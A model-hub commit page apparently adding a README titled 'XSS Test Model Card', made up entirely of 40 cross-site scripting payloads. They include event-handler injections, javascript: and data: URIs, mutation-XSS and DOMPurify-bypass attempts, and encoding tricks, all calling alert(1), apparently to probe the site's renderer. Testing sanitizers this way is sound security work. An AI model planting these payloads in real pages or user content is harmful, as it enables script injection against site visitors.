FIRSTACCOUNT69
/

xss-test-model

Model card Files Files and versions

xet

Community

FIRSTACCOUNT69 commited on 13 days ago

Commit

3faccab

verified ·

1 Parent(s): b901991

Add XSS test README

Browse files

Files changed (1) hide show

README.md +131 -0

README.md ADDED Viewed

	@@ -0,0 +1,131 @@

+---
+license: mit
+tags:
+- test
+---
+# XSS Test Model Card
+## Test 1: Basic HTML injection
+<img src=x onerror=alert(1)>
+## Test 2: SVG onload
+<svg onload=alert(1)>
+## Test 3: Details ontoggle
+<details open ontoggle=alert(1)><summary>test</summary>content</details>
+## Test 4: JavaScript link
+<a href="javascript:alert(1)">Click me JS</a>
+## Test 5: Markdown JS link
+[Click me MD](javascript:alert(1))
+## Test 6: iframe
+<iframe src="javascript:alert(1)">
+## Test 7: img with onerror
+<img src="x" onerror="alert(document.domain)">
+## Test 8: Math/mtext mutation XSS
+<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
+## Test 9: Object tag
+<object data="javascript:alert(1)">
+## Test 10: Body onload
+<body onload=alert(1)>
+## Test 11: Marquee onstart
+<marquee onstart=alert(1)>test</marquee>
+## Test 12: Input onfocus autofocus
+<input onfocus=alert(1) autofocus>
+## Test 13: Select onfocus autofocus
+<select onfocus=alert(1) autofocus>
+## Test 14: Textarea onfocus autofocus
+<textarea onfocus=alert(1) autofocus>
+## Test 15: Style tag
+<style>@import 'javascript:alert(1)'</style>
+## Test 16: Link tag
+<link rel="stylesheet" href="javascript:alert(1)">
+## Test 17: Video source
+<video><source onerror=alert(1)>
+## Test 18: Audio source
+<audio><source onerror=alert(1)>
+## Test 19: Script tag
+<script>alert(1)</script>
+## Test 20: Base href
+<base href="javascript:alert(1)//">
+## Test 21: HTML entities bypass
+&#60;img src=x onerror=alert(1)&#62;
+## Test 22: Unicode bypass
+＜script＞alert(1)＜/script＞
+## Test 23: Data URI image
+<img src="data:text/html,<script>alert(1)</script>">
+## Test 24: SVG use tag
+<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><image href='1' onerror='alert(1)'/></svg>#x">
+## Test 25: Custom element
+<custom-element onload=alert(1)>test</custom-element>
+## Test 26: MathML injection
+<math><mi//xlink:href="data:x,<script>alert(1)</script>">
+## Test 27: Template tag
+<template><img src=x onerror=alert(1)></template>
+## Test 28: Noscript tag
+<noscript><img src=x onerror=alert(1)></noscript>
+## Test 29: DOMPurify bypass attempts
+<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(1) src=1>">
+## Test 30: Meta tag
+<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
+## Test 31: Embed tag
+<embed src="javascript:alert(1)">
+## Test 32: Mutation XSS via namespace confusion
+<svg></p><style><g/onload=alert(1)>
+## Test 33: Event handler variations
+<img src=x onerror="alert`1`">
+<img src=x onerror=alert&lpar;1&rpar;>
+<img/src=x onerror=alert(1)>
+## Test 34: Tab/newline bypass
+<img src=x onerror	=alert(1)>
+<img src=x one
+rror=alert(1)>
+## Test 35: CSS expression
+<div style="background:url(javascript:alert(1))">test</div>
+## Test 36: Anchor with data URI
+<a href="data:text/html,<script>alert(1)</script>">data URI</a>
+## Test 37: Form action
+<form action="javascript:alert(1)"><button>submit</button></form>
+## Test 38: SVG with foreignObject
+<svg><foreignObject><body onload=alert(1)></foreignObject></svg>
+## Test 39: HTML comment trick
+<!--><img src=x onerror=alert(1)>-->
+## Test 40: Encoded events in markdown
+![test](x "onerror=alert(1)")